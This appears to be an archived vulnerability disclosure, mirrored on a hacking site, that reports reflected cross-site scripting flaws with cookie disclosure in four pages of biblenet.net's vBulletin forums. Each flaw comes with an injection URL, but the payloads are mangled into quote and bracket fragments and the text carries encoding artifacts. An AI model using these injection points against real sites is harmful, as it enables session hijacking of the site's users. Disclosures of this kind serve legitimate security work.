Biblenet.net - XSS
Biblenet.net - XSS
Biblenet.net=0D
=0D
Homepage:=0D
http://www.biblenet.net=0D
=0D
Affected files:=0D
gettinginvolved.html=0D
register.php=0D
member.php=0D
/library/index.html=0D
-----------------------------------------=0D
=0D
Biblespace uses vBulletin for most of their site, so most of these vulns are based in the vbulletin site themselves, which others have probably found before.=0D
=0D
XSS vuln with cookie disclosure via gettingInvolved.html:=0D
=0D
">">">">"><"<"<"<"=0D">http://www.biblenet.net/gettingInvolved.html?s=">">">">">"><"<"<"<"=0D
=0D
XSS vuln with cookie disclosure via register.php:=0D
">">">">"><"<"<"<"&action=signup=0D">http://www.biblenet.net/forums/register.php?s=\\">">">">">"><"<"<"<"&action=signup=0D
=0D
=0D
XSS vuln with cookie disclosure via member.php when editing profile, this time after we've logged in:=0D
=0D
">">">'>'>'><"<"<"<'<'=0D">http://www.biblenet.net/forums/member.php?action=editprofile&s=">">">">'>'>'><"<"<"<'<'=0D
=0D
Same XSS vuln above, this time on /library/index.html:=0D
">">">">"><"<"<"<"=0D">http://www.biblenet.net/library/index.html?s=questions">">">">">"><"<"<"<"=0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/biblespace1.jpg=0D
http://www.youfucktard.com/xsp/biblespace2.jpg=0D
http://www.youfucktard.com/xsp/biblespace3.jpg
The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.
